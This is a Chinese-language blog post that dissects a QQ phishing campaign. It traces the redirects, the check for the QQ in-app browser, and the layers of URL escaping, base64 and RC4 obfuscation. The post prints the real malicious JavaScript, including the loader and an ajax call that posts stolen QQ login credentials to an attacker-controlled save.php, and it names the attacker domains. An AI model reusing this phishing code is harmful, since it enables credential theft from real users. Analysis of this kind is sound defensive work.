密碼是如何被竊取的
中午小憩的時候收到一個不怎麼聯絡朋友的訊息:
這是你麼?https://sc.qq.com/*
(關鍵字串已經被隱去)
感覺Amazing!QQ官方連結吼!按照以前,打個哈哈就不管了,可能這次喝了咖啡太提神,於是我想看看這次釣魚是怎麼策劃的,於是...我點了。
PC上訪問這個地址會發現跳轉到QQ空間官方登入頁面,看來這個是做了規避(還是很縝密的吼),並且瀏覽器自帶的UA也是過不了的!看來直接通過瀏覽器開啟並不是此次攻擊的目標,也就是,人家要的是QQ內嵌瀏覽器的UA!
通過內嵌瀏覽器UA開啟頁面後發現是一個多重定向,但是Finally你回到這個地址:
http://www.xtuan.com/upload/qzone/20180402/18375979920.html
這個地址的正文非常簡單:
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>QQ空間-分享生活,留住感動</title>
<meta name="keywords" content="QQ空間,qzone,騰訊,社交,照片,相簿,日誌,說說,簽到,花藤,qq農場,qq牧場,親子相簿,旅遊相簿" />
<meta name="description" content="QQ空間(Qzone)是中國最大的社交網路,是QQ使用者的網上家園,是騰訊集團的核心平臺之一。您可以玩遊戲、玩裝扮、上傳照片、寫說說、寫日誌,黃鑽貴族還可以免費換裝並擁有多種特權。QQ空間同時致力於建設騰訊開放平臺,和第三方開發商、創業者一起為億萬中國網民提供卓越的、個性化的社交服務。" />
<script>
<!--
document.write(unescape("%3C%21doctype%20html%3E%0A%3Chtml%3E%0A%09%3Chead%3E%0A%09%09%3Cmeta%20charset%3D%22UTF-8%22%20/%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%20/%3E%0A%09%09%3Cmeta%20http-equiv%3D%22X-UA-
//節省篇幅
%u7684%u3001%u4E2A%u6027%u5316%u7684%u793E%u4EA4%u670D%u52A1%u3002%22%20/%3E%0A%3Cscript%20type%3D%22text/javascript%22%20src%3D%22//t.cn/RnBljgC%22%3E%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E"));
//-->
</script>
</head>
<body>
</body>
</html>
關鍵在script
中的http://t.cn/RnBljgC
,他將載入實際地址為http://js.qq.zonemedia.com.cn/app.php
的連結內容:
(function () {
var new_doc = document.open("text/html", "replace");
var html = unescape("%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%
//節省篇幅
%29%29%29%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E");
new_doc.write(html);
new_doc.close();
})();
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
setTimeout(function () {
set.remove();
}, 9)
}
document.title = '\u767b\u5f55';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}
看到https://www.baidu.com/favicon.ico
就覺得不對勁兒了…讓我們來解開中間的經過編碼的字串:
<script type="text/javascript">
document.write(decodeURIComponent(arcfour("b5d1322869e2d0b452f300798a8bc4d7",base64_decode("j88EHd3Su5Hrfnflkezn4Q10nAv68i5VNMq0RwBVxcH06tcKtcR8bpLufs2vW7O6CR5gm65kmRbUyE7U8U9gC//XVd2UEkkgbM4r4TxFcZGjux0rZ7F9yHWQHorXLIDgx/+8fFHesEYi33r2gJejmVNvGWf4wRrcKYCH9bJ2peKn8WEj/QSPs6Vm9eNWTnGl4gCQLvDvw8yQEtySncMEjSyV/5OIZoaZTh4KhOng/
看來這裡是一串被加密的二進位制,但是金鑰已經給出,加密方式已經給出(aRCfour),讓我們使用 RC4 解密再渲染一下: 可以看到整體上就是手機QQ登入的樣式,並且…甚至還直接引用了騰訊官方的CSS…但是關鍵:
//略去樣式和頭
if (!err){
$.ajax({
url:'http://js.qq.zonemedia.com.cn/save.php',
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
error:function(er){
$.getScript('http://js.qq.zonemedia.com.cn/share.php');
}
})
}
})
//省略尾
也就是如果我們天填寫了賬號和密碼就會被投遞到http://js.qq.zonemedia.com.cn/save.php
…然後你的QQ賬號就失控了。
我們來查檢視域名的主人是誰呢:
相關文章
- 防止程式碼被竊取,Python程式碼加密常用方案Python加密
- 如何有效防止網站資料被竊取、篡改?網站
- Linux下密碼憑證竊取技巧和工具介紹Linux密碼
- iOS逆向(4)-程式碼注入,非越獄竊取微信密碼iOS密碼
- 如何用計算機電源竊取機密資料?計算機
- Chrome瀏覽器擴充套件程式可竊取明文密碼Chrome瀏覽器套件密碼
- 如何防止他人竊取我的原始碼或圖片?原始碼
- Microsoft SQL伺服器被駭客入侵 頻寬被竊取ROSSQL伺服器
- 又是弱密碼的鍋,近10TB的商業檔案被竊,或與FBI有關密碼
- 還在讓瀏覽器儲存密碼?小心遭惡意軟體竊取瀏覽器密碼
- 竊取終端資料成本低,謹防Formbook惡意軟體入侵竊密ORM
- 無需hacking,新的WiKI-Eve攻擊能夠透過WiFi竊取數字密碼WiFi密碼
- NPM開原始碼庫惡意軟體包可透過Chrome的帳戶恢復工具竊取密碼NPM原始碼Chrome密碼
- 高通晶片關鍵漏洞暴露三星、LG手機上的機密資料,你的密碼可被輕鬆竊取!晶片密碼
- 如何避免手機失竊後傾家蕩產——手把把教你設定SIM卡密碼(也就是PIN密碼)密碼
- 《密碼學系列》|| 密碼學中的流密碼是怎麼回事?密碼學
- 如何讓Python不回顯獲取密碼輸入Python密碼
- 如何登入 oss 的賬號密碼是什麼密碼
- 9月30日全球網路安全熱點|比特幣網站被劫持、AirTag丟失模式或被用於竊取賬號密碼比特幣網站AI模式密碼
- 警惕大資料暗藏的“竊密通道”大資料
- WinMain是如何被呼叫的AI
- 被安裝惡意軟體、竊取原始碼,世界最大域名註冊商GoDaddy遭入侵多年原始碼Go
- 惡意 Python 庫被發現會竊取 SSH 和 GPG 金鑰Python
- 竊取個人資訊售賣 黑客團伙被連窩端黑客
- 國外免費代理ip地址密碼如何獲取?密碼
- 中國擬立密碼法 明確任何組織或個人不得竊取他人加密資訊密碼加密
- 涉嫌竊取最高機密 前NSA承包商馬丁已認罪
- 【偵破紀實】祕密安裝手機木馬竊取情報
- Metasploit之令牌竊取
- 別再用同一個密碼了 這黑客“撞庫”竊密已獲利百萬密碼黑客
- 超過5000個安裝!新的Android惡意軟體利用VNC監視和竊取受害者密碼AndroidVNC密碼
- CPU內部的奧秘:程式碼是如何被執行的?
- 獲取IP地址的途徑有哪些?要如何保護IP地址不被竊取?
- Java Main 如何是如何被執行的?JavaAI
- 以色列諜戰術:竟能靠調節螢幕亮度,行竊取機密之事?
- 谷歌多名資深 “開源大佬” 被裁員;駭客竊取 GitHub 的程式碼簽名證書|思否週刊谷歌Github
- 安卓手機木馬出現新變種,可禁用指紋、人臉識別以竊取密碼安卓密碼
- 微星被竊取1.5TB資料,駭客索要400萬美元贖金